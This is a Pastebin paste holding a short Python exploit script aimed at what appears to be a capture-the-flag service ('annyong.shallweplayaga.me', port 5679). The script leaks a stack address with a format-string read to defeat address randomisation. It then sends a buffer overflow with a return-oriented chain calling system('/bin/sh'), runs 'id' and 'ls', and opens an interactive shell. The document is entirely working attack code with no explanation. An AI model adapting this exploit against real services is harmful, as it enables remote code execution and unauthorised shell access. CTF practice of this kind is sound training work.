Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- from struct import pack
- import telnetlib
- import socket
- import sys
- addr = "annyong.shallweplayaga.me"
- port = 5679
- s = socket.socket()
- s.connect((addr, port))
- f = s.makefile('rw', bufsize=0)
- pop_rdi_ret = 0x7ffff7a8afd1
- bin_sh_addr = 0x7ffff7b949d1
- system_addr = 0x7ffff7a60660
- f.write('''%8$llx\n''')
- curr = int(f.readline().strip(), 16)
- orig = 0x7ffff7ffd040
- diff = orig - curr
- buf = ""
- buf += "A"*2072
- buf += pack("<Q", pop_rdi_ret - diff) # pop rdi; ret
- buf += pack("<Q", bin_sh_addr - diff) # rdi = "/bin/sh"
- buf += pack("<Q", system_addr - diff) # system()
- f.write(buf + "\n")
- f.write("echo pwn;id;uname -a;ls -la\n")
- t = telnetlib.Telnet()
- t.sock = s
- t.interact()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
